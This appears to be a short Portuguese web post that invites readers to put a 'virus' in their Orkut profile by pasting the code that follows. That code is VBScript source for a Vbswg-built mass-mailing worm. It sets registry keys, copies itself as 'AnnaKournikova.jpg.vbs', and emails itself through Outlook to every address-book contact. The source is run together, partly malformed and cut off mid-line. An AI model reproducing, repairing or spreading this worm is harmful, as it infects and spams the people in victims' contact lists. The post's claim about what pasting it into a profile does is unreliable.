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Virus no orkut!

Como poss oter um vírus no meu orkut? Saiba aqui. É bem simples, basta adicionar o código abaixp no seu perfil. No "Quem sou eu"
Vbs.OnTheFly Created By OnTheFly On Error Resume Next Set shellobject = CreateObject("WScript.Shell") shellobject.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b" Set filesystem= Createobject("scripting.filesystemobject") filesystem.copyfile wscript.scriptfullname,filesystem.GetSpecialFolder(0)&"\AnnaKournikova.
jpg.vbs" if shellobject.regread ("HKCU\software\OnTheFly\mailed") <> "1" then mail_trojan() end if if month(now) =1 and day(now) =26 then shellobject.run "http://google.com.br",3,false end if Set wormfile= filesystem.opentextfile(wscript.scriptfullname, 1) payload= wormfile.readall wormfile.Close If Not (filesystem.fileexists(wscript.scriptfullname)) Then Set newfile= filesystem.createtextfile(wscript.scriptfullname, True) newfile.writepayload newfile.Close End If Loop Function mail_trojan() On Error Resume Next Set outlook = CreateObject("Outlook.Application") If outlook= "Outlook"Then Set mapi=outlook.GetNameSpace("MAPI") Set addresses= mapi.AddressLists For Each address In addresses If address.AddressEntries.Count <> 0 Then count = address.AddressEntries.Count For I= 1 To count Set email = outlook.CreateItem(0) Set entry = address.AddressEntries(I) email.To = entry.Address email.Subject = "Here you

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